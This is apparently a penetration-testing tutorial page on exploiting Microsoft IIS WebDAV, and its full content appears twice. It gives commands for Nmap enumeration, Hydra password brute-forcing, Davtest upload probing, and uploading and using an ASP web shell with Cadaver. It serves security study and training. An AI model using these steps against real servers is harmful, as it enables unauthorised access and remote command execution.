Exploiting Microsoft IIS WebDAV

What is Microsoft IIS ?

IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.
It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.
IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.
Typically configured to run on ports 80/443.
Supported executable file extensions:
- .asp
- .aspx
- .config
- .php

What is WebDAV?

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.
WebDAV essentially enables a web server to function as a file server for collaborative authoring.
WebDAV runs on top Microsoft IIS on ports 80/443.
In order to connect to a WebDAV server, you will need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password.

WebDAV Exploitation

The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server.
We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.
After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

Tools for Exploitation

Attack Flow for the Microsoft IIS WebDAV Server

1. Identify the Target Using Nmap

Objective: Determine if the target web application is running Microsoft IIS WebDAV.

Command:

nmap -sC --script=http-enum <target>

Explanation:

-sC: Use default scripts.
--script=http-enum: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories.

2. Brute Force Authentication Using Hydra

Objective: Perform a brute force attack on the /webdav/ folder to gain authentication credentials.

Command:

hydra -l <user> -P <password_list> <target> http-get /webdav/

Explanation:

-l: Specifies the username.
-P: Specifies the password list.
http-get: Specifies the HTTP method and path to target.

3. Validate Upload Capabilities with Davtest

Objective: Confirm which file extensions can be uploaded and executed on the WebDAV server.

Command:

davtest -auth <user>:<pass> -url http://<target>/webdav

Explanation:

-auth: Specifies the authentication credentials.
-url: Specifies the URL of the WebDAV directory.

4. Upload a Shell Using Cadaver

Objective: Use Cadaver to upload a web shell to the server.

Command:

cadaver http://<target>/webdav

Procedure:

Run the command to start Cadaver.
When prompted, enter the username and password obtained from the brute force attack.
At the dav:/webdav/> prompt, use the following command to upload the shell:
```
put /usr/share/webshells/asp/webshell.asp
```

Explanation:

cadaver: Command-line WebDAV client.
put: Uploads the specified file to the WebDAV directory.

5. Access the Web Shell

Objective: Gain a GUI-based shell access to the server.

Steps:

Navigate to the uploaded shell in your browser:
```
http://<target>/webdav/webshell.asp
```
Use the web shell interface to execute commands on the server.

Hacker's Mantra:Should we fear hackers? Intention is at the heart of this discussion. - Kevin Mitnick

PreviousExploiting Windows Vulnerabilities NextExploiting WebDAV With Metasploit

Last updated 10 months ago

Was this helpful?

Exploiting Microsoft IIS WebDAV

What is Microsoft IIS ?

IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.
It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.
IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.
Typically configured to run on ports 80/443.
Supported executable file extensions:
- .asp
- .aspx
- .config
- .php

What is WebDAV?

WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.
WebDAV essentially enables a web server to function as a file server for collaborative authoring.
WebDAV runs on top Microsoft IIS on ports 80/443.
In order to connect to a WebDAV server, you will need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password.

WebDAV Exploitation

The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server.
We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.
After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

Tools for Exploitation

- Used to scan, authenticate and exploit a WebDAV server.
- Cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Attack Flow for the Microsoft IIS WebDAV Server

1. Identify the Target Using Nmap

Objective: Determine if the target web application is running Microsoft IIS WebDAV.

Command:

nmap -sC --script=http-enum <target>

Explanation:

-sC: Use default scripts.
--script=http-enum: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories.

2. Brute Force Authentication Using Hydra

Objective: Perform a brute force attack on the /webdav/ folder to gain authentication credentials.

Command:

hydra -l <user> -P <password_list> <target> http-get /webdav/

Explanation:

-l: Specifies the username.
-P: Specifies the password list.
http-get: Specifies the HTTP method and path to target.

3. Validate Upload Capabilities with Davtest

Objective: Confirm which file extensions can be uploaded and executed on the WebDAV server.

Command:

davtest -auth <user>:<pass> -url http://<target>/webdav

Explanation:

-auth: Specifies the authentication credentials.
-url: Specifies the URL of the WebDAV directory.

4. Upload a Shell Using Cadaver

Objective: Use Cadaver to upload a web shell to the server.

Command:

cadaver http://<target>/webdav

Procedure:

Run the command to start Cadaver.
When prompted, enter the username and password obtained from the brute force attack.
At the dav:/webdav/> prompt, use the following command to upload the shell:
```
put /usr/share/webshells/asp/webshell.asp
```

Explanation:

cadaver: Command-line WebDAV client.
put: Uploads the specified file to the WebDAV directory.

5. Access the Web Shell

Objective: Gain a GUI-based shell access to the server.

Steps:

Navigate to the uploaded shell in your browser:
```
http://<target>/webdav/webshell.asp
```
Use the web shell interface to execute commands on the server.

Hacker's Mantra:Should we fear hackers? Intention is at the heart of this discussion. - Kevin Mitnick

PreviousExploiting Windows Vulnerabilities NextExploiting WebDAV With Metasploit

Last updated 10 months ago

Was this helpful?